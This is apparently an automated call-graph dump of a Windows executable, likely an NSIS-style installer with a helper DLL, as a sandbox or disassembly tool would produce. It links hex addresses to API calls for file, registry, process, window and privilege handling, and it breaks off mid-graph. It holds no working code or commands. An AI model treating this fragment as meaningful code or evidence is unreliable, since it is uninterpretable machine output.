5357->5358 5359 4044bc GetSysColor 5357->5359 5358->5352 5359->5358 5360->5355 5361->5357 5362->5350 5363 401bdf 5364 402ba2 18 API calls 5363->5364 5365 401be6 5364->5365 5366 402ba2 18 API calls 5365->5366 5367 401bf0 5366->5367 5368 401c00 5367->5368 5369 402bbf 18 API calls 5367->5369 5370 401c10 5368->5370 5371 402bbf 18 API calls 5368->5371 5369->5368 5372 401c1b 5370->5372 5373 401c5f 5370->5373 5371->5370 5375 402ba2 18 API calls 5372->5375 5374 402bbf 18 API calls 5373->5374 5377 401c64 5374->5377 5376 401c20 5375->5376 5378 402ba2 18 API calls 5376->5378 5379 402bbf 18 API calls 5377->5379 5380 401c29 5378->5380 5381 401c6d FindWindowExW 5379->5381 5382 401c31 SendMessageTimeoutW 5380->5382 5383 401c4f SendMessageW 5380->5383 5384 401c8f 5381->5384 5382->5384 5383->5384 5385 401960 5386 402ba2 18 API calls 5385->5386 5387 401967 5386->5387 5388 402ba2 18 API calls 5387->5388 5389 401971 5388->5389 5390 402bbf 18 API calls 5389->5390 5391 40197a 5390->5391 5392 40198e lstrlenW 5391->5392 5393 4019ca 5391->5393 5394 401998 5392->5394 5394->5393 5398 40617e lstrcpynW 5394->5398 5396 4019b3 5396->5393 5397 4019c0 lstrlenW 5396->5397 5397->5393 5398->5396 5399 401662 5400 402bbf 18 API calls 5399->5400 5401 401668 5400->5401 5402 4064c1 2 API calls 5401->5402 5403 40166e 5402->5403 5404 4019e4 5405 402bbf 18 API calls 5404->5405 5406 4019eb 5405->5406 5407 402bbf 18 API calls 5406->5407 5408 4019f4 5407->5408 5409 4019fb lstrcmpiW 5408->5409 5410 401a0d lstrcmpW 5408->5410 5411 401a01 5409->5411 5410->5411 4268 4025e5 4282 402ba2 4268->4282 4270 40272d 4271 40263a ReadFile 4271->4270 4279 4025f4 4271->4279 4272 4026d3 4272->4270 4272->4279 4285 405e34 SetFilePointer 4272->4285 4274 40267a MultiByteToWideChar 4274->4279 4275 40272f 4296 4060c5 wsprintfW 4275->4296 4278 4026a0 SetFilePointer MultiByteToWideChar 4278->4279 4279->4270 4279->4271 4279->4272 4279->4274 4279->4275 4279->4278 4281 402740 4279->4281 4294 405dd6 ReadFile 4279->4294 4280 402761 SetFilePointer 4280->4270 4281->4270 4281->4280 4283 4061a0 18 API calls 4282->4283 4284 402bb6 4283->4284 4284->4279 4286 405e50 4285->4286 4291 405e6c 4285->4291 4287 405dd6 ReadFile 4286->4287 4288 405e5c 4287->4288 4289 405e75 SetFilePointer 4288->4289 4290 405e9d SetFilePointer 4288->4290 4288->4291 4289->4290 4292 405e80 4289->4292 4290->4291 4291->4272 4297 405e05 WriteFile 4292->4297 4295 405df4 4294->4295 4295->4279 4296->4270 4298 405e23 4297->4298 4298->4291 5412 406ae5 5414 4066ca 5412->5414 5413 407035 5414->5413 5415 406754 GlobalAlloc 5414->5415 5416 40674b GlobalFree 5414->5416 5417 4067c2 GlobalFree 5414->5417 5418 4067cb GlobalAlloc 5414->5418 5415->5413 5415->5414 5416->5415 5417->5418 5418->5413 5418->5414 4299 401e66 4300 402bbf 18 API calls 4299->4300 4301 401e6c 4300->4301 4302 4052dd 25 API calls 4301->4302 4303 401e76 4302->4303 4317 40585e CreateProcessW 4303->4317 4306 401edb CloseHandle 4309 40281e 4306->4309 4307 401e8c WaitForSingleObject 4308 401e9e 4307->4308 4310 401eb0 GetExitCodeProcess 4308->4310 4320 406594 4308->4320 4312 401ec2 4310->4312 4313 401ecf 4310->4313 4324 4060c5 wsprintfW 4312->4324 4313->4306 4314 401ecd 4313->4314 4314->4306 4318 405891 CloseHandle 4317->4318 4319 401e7c 4317->4319 4318->4319 4319->4306 4319->4307 4319->4309 4321 4065b1 PeekMessageW 4320->4321 4322 401ea5 WaitForSingleObject 4321->4322 4323 4065a7 DispatchMessageW 4321->4323 4322->4308 4323->4321 4324->4314 4334 401767 4335 402bbf 18 API calls 4334->4335 4336 40176e 4335->4336 4337 401796 4336->4337 4338 40178e 4336->4338 4392 40617e lstrcpynW 4337->4392 4391 40617e lstrcpynW 4338->4391 4341 401794 4345 406412 5 API calls 4341->4345 4342 4017a1 4393 405b32 lstrlenW CharPrevW 4342->4393 4349 4017b3 4345->4349 4350 4017c5 CompareFileTime 4349->4350 4351 401885 4349->4351 4354 40617e lstrcpynW 4349->4354 4360 4061a0 18 API calls 4349->4360 4369 40185c 4349->4369 4372 405d2e GetFileAttributesW 4349->4372 4375 405d53 GetFileAttributesW CreateFileW 4349->4375 4396 4064c1 FindFirstFileW 4349->4396 4399 4058c3 4349->4399 4350->4349 4352 4052dd 25 API calls 4351->4352 4355 40188f 4352->4355 4353 4052dd 25 API calls 4371 401871 4353->4371 4354->4349 4376 4030e7 4355->4376 4358 4018b6 SetFileTime 4359 4018c8 CloseHandle 4358->4359 4361 4018d9 4359->4361 4359->4371 4360->4349 4362 4018f1 4361->4362 4363 4018de 4361->4363 4365 4061a0 18 API calls 4362->4365 4364 4061a0 18 API calls 4363->4364 4367 4018e6 lstrcatW 4364->4367 4368 4018f9 4365->4368 4367->4368 4370 4058c3 MessageBoxIndirectW 4368->4370 4369->4353 4369->4371 4370->4371 4373 405d40 SetFileAttributesW 4372->4373 4374 405d4d 4372->4374 4373->4374 4374->4349 4375->4349 4377 403112 4376->4377 4378 4030f6 SetFilePointer 4376->4378 4403 4031ef GetTickCount 4377->4403 4378->4377 4381 405dd6 ReadFile 4382 403132 4381->4382 4383 4031ef 43 API calls 4382->4383 4387 4018a2 4382->4387 4384 403149 4383->4384 4385 4031b5 ReadFile 4384->4385 4384->4387 4389 403158 4384->4389 4385->4387 4387->4358 4387->4359 4388 405dd6 ReadFile 4388->4389 4389->4387 4389->4388 4390 405e05 WriteFile 4389->4390 4390->4389 4391->4341 4392->4342 4394 4017a7 lstrcatW 4393->4394 4395 405b4e lstrcatW 4393->4395 4394->4341 4395->4394 4397 4064e2 4396->4397 4398 4064d7 FindClose 4396->4398 4397->4349 4398->4397 4401 4058d8 4399->4401 4400 405924 4400->4349 4401->4400 4402 4058ec MessageBoxIndirectW 4401->4402 4402->4400 4404 403347 4403->4404 4405 40321d 4403->4405 4406 402d9f 33 API calls 4404->4406 4416 40336e SetFilePointer 4405->4416 4412 403119 4406->4412 4408 403228 SetFilePointer 4414 40324d 4408->4414 4412->4381 4412->4387 4413 405e05 WriteFile 4413->4414 4414->4412 4414->4413 4415 403328 SetFilePointer 4414->4415 4417 403358 4414->4417 4420 406697 4414->4420 4427 402d9f 4414->4427 4415->4404 4416->4408 4418 405dd6 ReadFile 4417->4418 4419 40336b 4418->4419 4419->4414 4421 4066bc 4420->4421 4422 4066c4 4420->4422 4421->4414 4422->4421 4423 406754 GlobalAlloc 4422->4423 4424 40674b GlobalFree 4422->4424 4425 4067c2 GlobalFree 4422->4425 4426 4067cb GlobalAlloc 4422->4426 4423->4421 4423->4422 4424->4423 4425->4426 4426->4421 4426->4422 4428 402db0 4427->4428 4429 402dc8 4427->4429 4430 402dc0 4428->4430 4431 402db9 DestroyWindow 4428->4431 4432 402dd0 4429->4432 4433 402dd8 GetTickCount 4429->4433 4430->4414 4431->4430 4434 406594 2 API calls 4432->4434 4433->4430 4435 402de6 4433->4435 4434->4430 4436 402e1b CreateDialogParamW ShowWindow 4435->4436 4437 402dee 4435->4437 4436->4430 4437->4430 4442 402d83 4437->4442 4439 402dfc wsprintfW 4440 4052dd 25 API calls 4439->4440 4441 402e19 4440->4441 4441->4430 4443 402d92 4442->4443 4444 402d94 MulDiv 4442->4444 4443->4444 4444->4439 5419 100018a9 5420 100018cc 5419->5420 5421 100018ff GlobalFree 5420->5421 5422 10001911 5420->5422 5421->5422 5423 10001272 2 API calls 5422->5423 5424 10001a87 GlobalFree GlobalFree 5423->5424 5425 401ee9 5426 402bbf 18 API calls 5425->5426 5427 401ef0 5426->5427 5428 4064c1 2 API calls 5427->5428 5429 401ef6 5428->5429 5431 401f07 5429->5431 5432 4060c5 wsprintfW 5429->5432 5432->5431 4448 403d6a 4449 403d82 4448->4449 4450 403ebd 4448->4450 4449->4450 4451 403d8e 4449->4451 4452 403ece GetDlgItem GetDlgItem 4450->4452 4461 403f0e 4450->4461 4453 403d99 SetWindowPos 4451->4453 4454 403dac 4451->4454 4455 404242 19 API calls 4452->4455 4453->4454 4458 403db1 ShowWindow 4454->4458 4459 403dc9 4454->4459 4460 403ef8 SetClassLongW 4455->4460 4456 403f68 4466 403eb8 4456->4466 4519 40428e 4456->4519 4458->4459 4462 403dd1 DestroyWindow 4459->4462 4463 403deb 4459->4463 4464 40140b 2 API calls 4460->4464 4461->4456 4465 401389 2 API calls 4461->4465 4467 4041ec 4462->4467 4468 403df0 SetWindowLongW 4463->4468 4469 403e01 4463->4469 4464->4461 4470 403f40 4465->4470 4467->4466 4477 4041fc ShowWindow 4467->4477 4468->4466 4473 403eaa 4469->4473 4474 403e0d GetDlgItem 4469->4474 4470->4456 4475 403f44 SendMessageW 4470->4475 4471 40140b 2 API calls 4493 403f7a 4471->4493 4472 4041cd DestroyWindow EndDialog 4472->4467 4538 4042a9 4473->4538 4478 403e20 SendMessageW IsWindowEnabled 4474->4478 4479 403e3d 4474->4479 4475->4466 4477->4466 4478->4466 4478->4479 4481 403e4a 4479->4481 4482 403e91 SendMessageW 4479->4482 4483 403e5d 4479->4483 4491 403e42 4479->4491 4480 4061a0 18 API calls 4480->4493 4481->4482 4481->4491 4482->4473 4486 403e65 4483->4486 4487 403e7a 4483->4487 4485 404242 19 API calls 4485->4493 4532 40140b 4486->4532 4490 40140b 2 API calls 4487->4490 4488 403e78 4488->4473 4492 403e81 4490->4492 4535 40421b 4491->4535 4492->4473 4492->4491 4493->4466 4493->4471 4493->4472 4493->4480 4493->4485 4509 40410d DestroyWindow 4493->4509 4522 404242 4493->4522 4495 403ff5 GetDlgItem 4496 404012 ShowWindow KiUserCallbackDispatcher 4495->4496 4497 40400a 4495->4497 4525 404264 EnableWindow 4496->4525 4497->4496 4499 40403c EnableWindow 4502 404050 4499->4502 4500 404055 GetSystemMenu EnableMenuItem SendMessageW 4501 404085 SendMessageW 4500->4501 4500->4502 4501->4502 4502->4500 4526 404277 SendMessageW 4502->4526 4527 40617e lstrcpynW 4502->4527 4505 4040b3 lstrlenW 4506 4061a0 18 API calls 4505->4506 4507 4040c9 SetWindowTextW 4506->4507 4528 401389 4507->4528 4509->4467 4510 404127 CreateDialogParamW 4509->4510 4510->4467 4511 40415a 4510->4511 4512 404242 19 API calls 4511->4512 4513 404165 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4512->4513 4514 401389 2 API calls 4513->4514 4515 4041ab 4514->4515 4515->4466 4516 4041b3 ShowWindow 4515->4516 4517 40428e SendMessageW 4516->4517 4518 4041cb 4517->4518 4518->4467 4520 4042a6 4519->4520 4521 404297 SendMessageW 4519->4521 4520->4493 4521->4520 4523 4061a0 18 API calls 4522->4523 4524 40424d SetDlgItemTextW 4523->4524 4524->4495 4525->4499 4526->4502 4527->4505 4530 401390 4528->4530 4529 4013fe 4529->4493 4530->4529 4531 4013cb MulDiv SendMessageW 4530->4531 4531->4530 4533 401389 2 API calls 4532->4533 4534 401420 4533->4534 4534->4491 4536 404222 4535->4536 4537 404228 SendMessageW 4535->4537 4536->4537 4537->4488 4539 4042c1 GetWindowLongW 4538->4539 4549 40434a 4538->4549 4540 4042d2 4539->4540 4539->4549 4541 4042e1 GetSysColor 4540->4541 4542 4042e4 4540->4542 4541->4542 4543 4042f4 SetBkMode 4542->4543 4544 4042ea SetTextColor 4542->4544 4545 404312 4543->4545 4546 40430c GetSysColor 4543->4546 4544->4543 4547 404323 4545->4547 4548 404319 SetBkColor 4545->4548 4546->4545 4547->4549 4550 404336 DeleteObject 4547->4550 4551 40433d CreateBrushIndirect 4547->4551 4548->4547 4549->4466 4550->4551 4551->4549 5433 4021ea 5434 402bbf 18 API calls 5433->5434 5435 4021f0 5434->5435 5436 402bbf 18 API calls 5435->5436 5437 4021f9 5436->5437 5438 402bbf 18 API calls 5437->5438 5439 402202 5438->5439 5440 4064c1 2 API calls 5439->5440 5441 40220b 5440->5441 5442 40221c lstrlenW lstrlenW 5441->5442 5446 40220f 5441->5446 5444 4052dd 25 API calls 5442->5444 5443 4052dd 25 API calls 5447 402217 5443->5447 5445 40225a SHFileOperationW 5444->5445 5445->5446 5445->5447 5446->5443 5446->5447 5448 40156b 5449 401584 5448->5449 5450 40157b ShowWindow 5448->5450 5451 401592 ShowWindow 5449->5451 5452 402a4c 5449->5452 5450->5449 5451->5452 5453 40226e 5454 402275 5453->5454 5458 402288 5453->5458 5455 4061a0 18 API calls 5454->5455 5456 402282 5455->5456 5457 4058c3 MessageBoxIndirectW 5456->5457 5457->5458 5459 4014f1 SetForegroundWindow 5460 402a4c 5459->5460 5461 401673 5462 402bbf 18 API calls 5461->5462 5463 40167a 5462->5463 5464 402bbf 18 API calls 5463->5464 5465 401683 5464->5465 5466 402bbf 18 API calls 5465->5466 5467 40168c MoveFileW 5466->5467 5468 40169f 5467->5468 5474 401698 5467->5474 5469 4021e1 5468->5469 5470 4064c1 2 API calls 5468->5470 5472 4016ae 5470->5472 5471 401423 25 API calls 5471->5469 5472->5469 5473 40601f 38 API calls 5472->5473 5473->5474 5474->5471 5475 100016b6 5476 100016e5 5475->5476 5477 10001b18 22 API calls 5476->5477 5478 100016ec 5477->5478 5479 100016f3 5478->5479 5480 100016ff 5478->5480 5481 10001272 2 API calls 5479->5481 5482 10001726 5480->5482 5483 10001709 5480->5483 5484 100016fd 5481->5484 5486 10001750 5482->5486 5487 1000172c 5482->5487 5485 1000153d 3 API calls 5483->5485 5489 1000170e 5485->5489 5488 1000153d 3 API calls 5486->5488 5490 100015b4 3 API calls 5487->5490 5488->5484 5492 100015b4 3 API calls 5489->5492 5491 10001731 5490->5491 5493 10001272 2 API calls 5491->5493 5494 10001714 5492->5494 5495 10001737 GlobalFree 5493->5495 5496 10001272 2 API calls 5494->5496 5495->5484 5497 1000174b GlobalFree 5495->5497 5498 1000171a GlobalFree 5496->5498 5497->5484 5498->5484 5499 10002238 5500 10002296 5499->5500 5501 100022cc 5499->5501 5500->5501 5502 100022a8 GlobalAlloc 5500->5502 5502->5500 5503 401cfa GetDlgItem GetClientRect 5504 402bbf 18 API calls 5503->5504 5505 401d2c LoadImageW SendMessageW 5504->5505 5506 401d4a DeleteObject 5505->5506 5507 402a4c 5505->5507 5506->5507 5092 40237b 5093 402381 5092->5093 5094 402bbf 18 API calls 5093->5094 5095 402393 5094->5095 5096 402bbf 18 API calls 5095->5096 5097 40239d RegCreateKeyExW 5096->5097 5098 4023c7 5097->5098 5099 40281e 5097->5099 5100 4023e2 5098->5100 5101 402bbf 18 API calls 5098->5101 5102 4023ee 5100->5102 5104 402ba2 18 API calls 5100->5104 5103 4023d8 lstrlenW 5101->5103 5105 402409 RegSetValueExW 5102->5105 5106 4030e7 45 API calls 5102->5106 5103->5100 5104->5102 5107 40241f RegCloseKey 5105->5107 5106->5105 5107->5099 5109 4027fb 5110 402bbf 18 API calls 5109->5110 5111 402802 FindFirstFileW 5110->5111 5112 40282a 5111->5112 5115 402815 5111->5115 5113 402833 5112->5113 5117 4060c5 wsprintfW 5112->5117 5118 40617e lstrcpynW 5113->5118 5117->5113 5118->5115 5522 1000103d 5523 1000101b 5 API calls 5522->5523 5524 10001056 5523->5524 5525 4014ff 5526 401507 5525->5526 5528 40151a 5525->5528 5527 402ba2 18 API calls 5526->5527 5527->5528 5529 401000 5530 401037 BeginPaint GetClientRect 5529->5530 5531 40100c DefWindowProcW 5529->5531 5533 4010f3 5530->5533 5534 401179 5531->5534 5535 401073 CreateBrushIndirect FillRect DeleteObject 5533->5535 5536 4010fc 5533->5536 5535->5533 5537 401102 CreateFontIndirectW 5536->5537 5538 401167 EndPaint 5536->5538 5537->5538 5539 401112 6 API calls 5537->5539 5538->5534 5539->5538 5547 401904 5548 40193b 5547->5548 5549 402bbf 18 API calls 5548->5549 5550 401940 5549->5550 5551 40596f 69 API calls 5550->5551 5552 401949 5551->5552 5553 402d04 5554 402d16 SetTimer 5553->5554 5555 402d2f 5553->5555 5554->5555 5556 402d7d 5555->5556 5557 402d83 MulDiv 5555->5557 5558 402d3d wsprintfW SetWindowTextW SetDlgItemTextW 5557->5558 5558->5556 5560 403985 5561 403990 5560->5561 5562 403994 5561->5562 5563 403997 GlobalAlloc 5561->5563 5563->5562 4325 402786 4326 4029f7 4325->4326 4327 40278d 4325->4327 4328 402ba2 18 API calls 4327->4328 4329 402798 4328->4329 4330 40279f SetFilePointer 4329->4330 4330->4326 4331 4027af 4330->4331 4333 4060c5 wsprintfW 4331->4333 4333->4326 4445 100027c7 4446 10002817 4445->4446 4447 100027d7 VirtualProtect 4445->4447 4447->4446 5564 401907 5565 402bbf 18 API calls 5564->5565 5566 40190e 5565->5566 5567 4058c3 MessageBoxIndirectW 5566->5567 5568 401917 5567->5568 5569 401e08 5570 402bbf 18 API calls 5569->5570 5571 401e0e 5570->5571 5572 402bbf 18 API calls 5571->5572 5573 401e17 5572->5573 5574 402bbf 18 API calls 5573->5574 5575 401e20 5574->5575 5576 402bbf 18 API calls 5575->5576 5577 401e29 5576->5577 5578 401423 25 API calls 5577->5578 5579 401e30 ShellExecuteW 5578->5579 5580 401e61 5579->5580 5586 1000164f 5587 10001516 GlobalFree 5586->5587 5589 10001667 5587->5589 5588 100016ad GlobalFree 5589->5588 5590 10001682 5589->5590 5591 10001699 VirtualFree 5589->5591 5590->5588 5591->5588 5592 404390 lstrlenW 5593 4043b1 WideCharToMultiByte 5592->5593 5594 4043af 5592->5594 5594->5593 5595 401491 5596 4052dd 25 API calls 5595->5596 5597 401498 5596->5597 5605 401a15 5606 402bbf 18 API calls 5605->5606 5607 401a1e ExpandEnvironmentStringsW 5606->5607 5608 401a32 5607->5608 5610 401a45 5607->5610 5609 401a37 lstrcmpW 5608->5609 5608->5610 5609->5610 5611 402515 5612 402bbf 18 API calls 5611->5612 5613 40251c 5612->5613 5616 405d53 GetFileAttributesW CreateFileW 5613->5616 5615 402528 5616->5615 5617 402095 5618 402bbf 18 API calls 5617->5618 5619 40209c 5618->5619 5620 402bbf 18 API calls 5619->5620 5621 4020a6 5620->5621 5622 402bbf 18 API calls 5621->5622 5623 4020b0 5622->5623 5624 402bbf 18 API calls 5623->5624 5625 4020ba 5624->5625 5626 402bbf 18 API calls 5625->5626 5628 4020c4 5626->5628 5627 402103 CoCreateInstance 5632 402122 5627->5632 5628->5627 5629 402bbf 18 API calls 5628->5629 5629->5627 5630 401423 25 API calls 5631 4021e1 5630->5631 5632->5630 5632->5631 5633 401b16 5634 402bbf 18 API calls 5633->5634 5635 401b1d 5634->5635 5636 402ba2 18 API calls 5635->5636 5637 401b26 wsprintfW 5636->5637 5638 402a4c 5637->5638 5639 404696 5640 4046a6 5639->5640 5641 4046cc 5639->5641 5643 404242 19 API calls 5640->5643 5642 4042a9 8 API calls 5641->5642 5644 4046d8 5642->5644 5645 4046b3 SetDlgItemTextW 5643->5645 5645->5641 5646 10001058 5647 10001074 5646->5647 5648 100010dd 5647->5648 5649 10001516 GlobalFree 5647->5649 5650 10001092 5647->5650 5649->5650 5651 10001516 GlobalFree 5650->5651 5652 100010a2 5651->5652 5653 100010b2 5652->5653 5654 100010a9 GlobalSize 5652->5654 5655 100010b6 GlobalAlloc 5653->5655 5656 100010c7 5653->5656 5654->5653 5657 1000153d 3 API calls 5655->5657 5658 100010d2 GlobalFree 5656->5658 5657->5656 5658->5648 5659 40159b 5660 402bbf 18 API calls 5659->5660 5661 4015a2 SetFileAttributesW 5660->5661 5662 4015b4 5661->5662 5663 40541c 5664 4055c6 5663->5664 5665 40543d GetDlgItem GetDlgItem GetDlgItem 5663->5665 5667 4055f7 5664->5667 5668 4055cf GetDlgItem CreateThread CloseHandle 5664->5668 5708 404277 SendMessageW 5665->5708 5669 405647 5667->5669 5670 40560e ShowWindow ShowWindow 5667->5670 5672 405622 5667->5672 5668->5667 5678 4042a9 8 API calls 5669->5678 5710 404277 SendMessageW 5670->5710 5671 405682 5671->5669 5681 405690 SendMessageW 5671->5681 5672->5671 5676 405636 5672->5676 5677 40565c ShowWindow 5672->5677 5673 4054ad 5674 4054b4 GetClientRect GetSystemMetrics SendMessageW SendMessageW 5673->5674 5679 405522 5674->5679 5680 405506 SendMessageW SendMessageW 5674->5680 5682 40421b SendMessageW 5676->5682 5684 40567c 5677->5684 5685 40566e 5677->5685 5683 405655 5678->5683 5686 405535 5679->5686 5687 405527 SendMessageW 5679->5687 5680->5679 5681->5683 5688 4056a9 CreatePopupMenu 5681->5688 5682->5669 5690 40421b SendMessageW 5684->5690 5689 4052dd 25 API calls 5685->5689 5692 404242 19 API calls 5686->5692 5687->5686 5691 4061a0 18 API calls 5688->5691 5689->5684 5690->5671 5693 4056b9 AppendMenuW 5691->5693 5694 405545 5692->5694 5695 4056d6 GetWindowRect 5693->5695 5696 4056e9 TrackPopupMenu 5693->5696 5697 405582 GetDlgItem SendMessageW 5694->5697 5698 40554e ShowWindow 5694->5698 5695->5696 5696->5683 5699 405704 5696->5699 5697->5683 5701 4055a9 SendMessageW SendMessageW 5697->5701 5700 405564 ShowWindow 5698->5700 5703 405571 5698->5703 5702 405720 SendMessageW 5699->5702 5700->5703 5701->5683 5702->5702 5704 40573d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5702->5704 5709 404277 SendMessageW 5703->5709 5706 405762 SendMessageW 5704->5706 5706->5706 5707 40578b GlobalUnlock SetClipboardData CloseClipboard 5706->5707 5707->5683 5708->5673 5709->5697 5710->5672 5127 40229d 5128 4022a5 5127->5128 5129 4022ab 5127->5129 5130 402bbf 18 API calls 5128->5130 5131 4022b9 5129->5131 5132 402bbf 18 API calls 5129->5132 5130->5129 5133 4022c7 5131->5133 5135 402bbf 18 API calls 5131->5135 5132->5131 5134 402bbf 18 API calls 5133->5134 5136 4022d0 WritePrivateProfileStringW 5134->5136 5135->5133 5711 401f1d 5712 402bbf 18 API calls 5711->5712 5713 401f24 5712->5713 5714 406558 5 API calls 5713->5714 5715 401f33 5714->5715 5716 401f4f GlobalAlloc 5715->5716 5718 401fb7 5715->5718 5717 401f63 5716->5717 5716->5718 5719 406558 5 API calls 5717->5719 5720 401f6a 5719->5720 5721 406558 5 API calls 5720->5721 5722 401f74 5721->5722 5722->5718 5726 4060c5 wsprintfW 5722->5726 5724 401fa9 5727 4060c5 wsprintfW 5724->5727 5726->5724 5727->5718 5728 40149e 5729 402288 5728->5729 5730 4014ac PostQuitMessage 5728->5730 5730->5729 5731 40249e 5732 402cc9 19 API calls 5731->5732 5733 4024a8 5732->5733 5734 402ba2 18 API calls 5733->5734 5735 4024b1 5734->5735 5736 4024d5 RegEnumValueW 5735->5736 5737 4024c9 RegEnumKeyW 5735->5737 5739 40281e 5735->5739 5738 4024ee RegCloseKey 5736->5738 5736->5739 5737->5738 5738->5739 5741 40231f 5742 402324 5741->5742 5743 40234f 5741->5743 5744 402cc9 19 API calls 5742->5744 5745 402bbf 18 API calls 5743->5745 5746 40232b 5744->5746 5747 402356 5745->5747 5748 402bbf 18 API calls 5746->5748 5751 40236c 5746->5751 5752 402bff RegOpenKeyExW 5747->5752 5750 40233c RegDeleteValueW RegCloseKey 5748->5750 5750->5751 5756 402c2a 5752->5756 5760 402c76 5752->5760 5753 402c50 RegEnumKeyW 5754 402c62 RegCloseKey 5753->5754 5753->5756 5757 406558 5 API calls 5754->5757 5755 402c87 RegCloseKey 5755->5760 5756->5753 5756->5754 5756->5755 5758 402bff 5 API calls 5756->5758 5759 402c72 5757->5759 5758->5756 5759->5760 5761 402ca2 RegDeleteKeyW 5759->5761 5760->5751 5761->5760 5762 100010e1 5771 10001111 5762->5771 5763 100011d8 GlobalFree 5764 100012ba 2 API calls 5764->5771 5765 100011d3 5765->5763 5766 10001164 GlobalAlloc 5766->5771 5767 100011f8 GlobalFree 5767->5771 5768 10001272 2 API calls 5769 100011c4 GlobalFree 5768->5769 5769->5771 5770 100012e1 lstrcpyW 5770->5771 5771->5763 5771->5764 5771->5765 5771->5766 5771->5767 5771->5768 5771->5769 5771->5770 5772 401ca3 5773 402ba2 18 API calls 5772->5773 5774 401ca9 IsWindow 5773->5774 5775 401a05 5774->5775 5776 402a27 SendMessageW 5777 402a41 InvalidateRect 5776->5777 5778 402a4c 5776->5778 5777->5778 4552 40242a 4563 402cc9 4552->4563 4554 402434 4555 402bbf 18 API calls 4554->4555 4556 40243d 4555->4556 4557 402448 RegQueryValueExW 4556->4557 4562 40281e 4556->4562 4558 40246e RegCloseKey 4557->4558 4559 402468 4557->4559 4558->4562 4559->4558 4567 4060c5 wsprintfW 4559->4567 4564 402bbf 18 API calls 4563->4564 4565 402ce2 4564->4565 4566 402cf0 RegOpenKeyExW 4565->4566 4566->4554 4567->4558 5786 40172d 5787 402bbf 18 API calls 5786->5787 5788 401734 SearchPathW 5787->5788 5789 40174f 5788->5789 5790 404a33 5791 404a43 5790->5791 5792 404a5f 5790->5792 5801 4058a7 GetDlgItemTextW 5791->5801 5794 404a92 5792->5794 5795 404a65 SHGetPathFromIDListW 5792->5795 5797 404a75 5795->5797 5800 404a7c SendMessageW 5795->5800 5796 404a50 SendMessageW 5796->5792 5798 40140b 2 API calls 5797->5798 5798->5800 5800->5794 5801->5796 5802 4027b4 5803 4027ba 5802->5803 5804 4027c2 FindClose 5803->5804 5805 402a4c 5803->5805 5804->5805 4609 4033b6 SetErrorMode GetVersion 4610 4033eb 4609->4610 4611 4033f1 4609->4611 4612 406558 5 API calls 4610->4612 4697 4064e8 GetSystemDirectoryW 4611->4697 4612->4611 4614 403407 lstrlenA 4614->4611 4615 403417 4614->4615 4700 406558 GetModuleHandleA 4615->4700 4618 406558 5 API calls 4619 403426 #17 OleInitialize SHGetFileInfoW 4618->4619 4706 40617e lstrcpynW 4619->4706 4621 403463 GetCommandLineW 4707 40617e lstrcpynW 4621->4707 4623 403475 GetModuleHandleW 4624 40348d 4623->4624 4625 405b5f CharNextW 4624->4625 4626 40349c CharNextW 4625->4626 4627 4035c6 GetTempPathW 4626->4627 4633 4034b5 4626->4633 4708 403385 4627->4708 4629 4035de 4630 4035e2 GetWindowsDirectoryW lstrcatW 4629->4630 4631 403638 DeleteFileW 4629->4631 4634 403385 12 API calls 4630->4634 4718 402e41 GetTickCount GetModuleFileNameW 4631->4718 4635 405b5f CharNextW 4633->4635 4639 4035af 4633->4639 4642 4035b1 4633->4642 4637 4035fe 4634->4637 4635->4633 4636 40364c 4640 4036ef 4636->4640 4644 405b5f CharNextW 4636->4644 4693 4036ff 4636->4693 4637->4631 4638 403602 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4637->4638 4643 403385 12 API calls 4638->4643 4639->4627 4748 4039c7 4640->4748 4804 40617e lstrcpynW 4642->4804 4648 403630 4643->4648 4661 40366b 4644->4661 4648->4631 4648->4693 4649 403839 4651 403841 GetCurrentProcess OpenProcessToken 4649->4651 4652 4038bd ExitProcess 4649->4652 4650 403719 4653 4058c3 MessageBoxIndirectW 4650->4653 4654 403859 LookupPrivilegeValueW AdjustTokenPrivileges 4651->4654 4655 40388d 4651->4655 4659 403727 ExitProcess 4653->4659 4654->4655 4660 406558 5 API calls 4655->4660 4657 4036c9 4805 405c3a 4657->4805 4658 40372f 4830 405846 4658->4830 4665 403894 4660->4665 4661->4657 4661->4658 4669 4038a9 ExitWindowsEx 4665->4669 4672 4038b6 4665->4672 4667 403750 lstrcatW lstrcmpiW 4671 40376c 4667->4671 4667->4693 4668 403745 lstrcatW 4668->4667 4669->4652 4669->4672 4674 403771 4671->4674 4675 403778 4671->4675 4676 40140b 2 API calls 4672->4676 4673 4036e4 4820 40617e lstrcpynW 4673->4820 4833 4057ac CreateDirectoryW 4674->4833 4838 405829 CreateDirectoryW 4675->4838 4676->4652 4681 40377d SetCurrentDirectoryW 4682 403798 4681->4682 4683 40378d 4681->4683 4842 40617e lstrcpynW 4682->4842 4841 40617e lstrcpynW 4683->4841 4686 4037a6 4687 4061a0 18 API calls 4686->4687 4690 40382d 4686->4690 4694 4061a0 18 API calls 4686->4694 4695 40585e 2 API calls 4686->4695 4696 403818 CloseHandle 4686->4696 4843 40601f MoveFileExW 4686->4843 4688 4037d7 DeleteFileW 4687->4688 4688->4686 4689 4037e4 CopyFileW 4688->4689 4689->4686 4692 40601f 38 API calls 4690->4692 4692->4693 4821 4038d5 4693->4821 4694->4686 4695->4686 4696->4686 4698 40650a wsprintfW LoadLibraryExW 4697->4698 4698->4614 4701 406574 4700->4701 4702 40657e GetProcAddress 4700->4702 4703 4064e8 3 API calls 4701->4703 4704 40341f 4702->4704 4705 40657a 4703->4705 4704->4618 4705->4702 4705->4704 4706->4621 4707->4623 4709 406412 5 API calls 4708->4709 4710 403391 4709->4710 4711 40339b 4710->4711 4712 405b32 3 API calls 4710->4712 4711->4629 4713 4033a3 4712->4713 4714 405829 2 API calls 4713->4714 4715 4033a9 4714->4715 4716 405d82 2 API calls 4715->4716 4717 4033b4 4716->4717 4717->4629 4847 405d53 GetFileAttributesW CreateFileW 4718->4847 4720 402e84 4747 402e91 4720->4747 4848 40617e lstrcpynW 4720->4848 4722 402ea7 4849 405b7e lstrlenW 4722->4849 4726 402eb8 GetFileSize 4727 402fb9 4726->4727 4746 402ecf 4726->4746 4728 402d9f 33 API calls 4727->4728 4730 402fc0 4728->4730 4729 403358 ReadFile 4729->4746 4731 402ffc GlobalAlloc 4730->4731 4730->4747 4855 40336e SetFilePointer 4730->4855 4734 403013 4731->4734 4732 403054 4735 402d9f 33 API calls 4732->4735 4739 405d82 2 API calls 4734->4739 4735->4747 4736 402fdd 